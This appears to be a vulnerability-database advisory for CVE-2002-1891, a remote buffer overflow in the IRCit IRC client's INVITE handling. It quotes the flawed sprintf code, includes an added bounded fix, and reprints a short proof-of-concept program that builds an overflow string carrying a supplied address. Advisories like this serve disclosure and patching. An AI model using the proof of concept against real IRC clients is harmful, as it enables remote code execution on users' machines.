Ayman Akt IRCit IRC Client Remote Buffer Overflow Vulnerability


Vulnerability ID: 1106785    Vulnerability type: Boundary condition error
Published: 2002-06-12    Updated: 2005-10-20
CVE ID: CVE-2002-1891
CNNVD-ID: CNNVD-200212-350
Platform: Linux    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21537
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-350
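|Vulnerability details
IRCit is an IRC client that runs on a variety of Linux and Unix operating systems. IRCit does not perform proper bounds checking on data sent by the server. A remote attacker can exploit this to cause a buffer overflow, which may lead to execution of arbitrary instructions on the target system with the privileges of the IRCit process. The problem is in the IRCit serverr.c code:

…
STD_IRC_SERVER(sINVITE)
{
    char *n, *h, *v;

    if (n = splitn(&from), !from) from = "*@*";
    if (v = splitw(&rest), ((rest) && (*rest == ':'))) rest++;
    if ((mt_ptr->c_ignore & IG_INVITE) == 0) {
        char s[MAXHOSTLEN];

        FIXIT(from);
        sprintf(s, "%s!%s", n, from);
…

Here the from data is written into the fixed-size buffer without a proper check. An attacker can spoof IRC server messages and send a maliciously crafted INVITE command to trigger a core dump in the client; carefully crafted INVITE command data may lead to execution of arbitrary instructions on the target system with the privileges of the IRCit process.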
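A bounded form of the sprintf(s, "%s!%s", n, from) call that rejects oversized server input instead of writing past s. This is an added example, not IRCit's code and not part of the original advisory; build_prefix is a hypothetical helper, and the MAXHOSTLEN value and sample inputs are assumptions constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define MAXHOSTLEN 64   /* assumed value; the page does not give IRCit's definition */

/* Bounded replacement for sprintf(s, "%s!%s", n, from).
 * Returns 0 on success, -1 if "nick!from" would not fit in dst.
 * On failure dst is left as the empty string, so the caller never
 * acts on a silently truncated origin. */
int build_prefix(char *dst, size_t dstlen, const char *nick, const char *from)
{
    int need;

    if (dst == NULL || dstlen == 0)
        return -1;
    dst[0] = '\0';
    if (nick == NULL || from == NULL)
        return -1;

    need = snprintf(dst, dstlen, "%s!%s", nick, from);
    if (need < 0 || (size_t)need >= dstlen) {
        dst[0] = '\0';          /* discard oversized server-supplied data */
        return -1;
    }
    return 0;
}

int main(void)
{
    char s[MAXHOSTLEN];
    char big[512];
    int rc;

    /* Constructed inputs: one ordinary INVITE origin, one far longer than s */
    memset(big, 'x', sizeof(big) - 1);
    big[sizeof(big) - 1] = '\0';

    rc = build_prefix(s, sizeof(s), "alice", "user@host.example");
    printf("normal:    rc=%d s=\"%s\"\n", rc, s);
    rc = build_prefix(s, sizeof(s), "alice", big);
    printf("oversized: rc=%d s=\"%s\"\n", rc, s);
    return 0;
}
```

A caller in the INVITE handler would drop the message when build_prefix returns -1 rather than continue with a partial prefix.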
|Exploit
source: http://www.securityfocus.com/bid/4998/info

IRCIT is a terminal based IRC client for Linux and Unix systems.

IRCIT contains a remote buffer overflow vulnerability. When an INVITE message is received, the supplied "from" user data is copied into a fixed buffer of length MAXHOSTLEN. A maliciously formatted message may overflow this buffer and execute arbitrary code as the IRCIT client.

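/* GOBBLES-invite.c */

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memset() */

int
main(int argc, char **argv)
{
        char heh[175], *store;
        int i;

        if(argc == 1) exit(0);

        /* argv[1] is a pointer value, parsed with %p */
        sscanf(argv[1], "%p", &store);
        /* fill the buffer, then place the pointer value at offsets 166 and 170 */
        memset(heh, 'x', sizeof(heh));
        *(long *)&heh[166] = (long)store;
        *(long *)&heh[170] = (long)store;
        heh[174] = '\0';

        fprintf(stdout, "%s", heh);
        exit(0);
}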
|References

Source: BID
Name: 4998
Link: http://www.securityfocus.com/bid/4998
Source: XF
Name: ircit-invite-bo(9340)
Link: http://www.iss.net/security_center/static/9340.php
Source: NSFOCUS
Name: 2972
Link: http://www.nsfocus.net/vulndb/2972
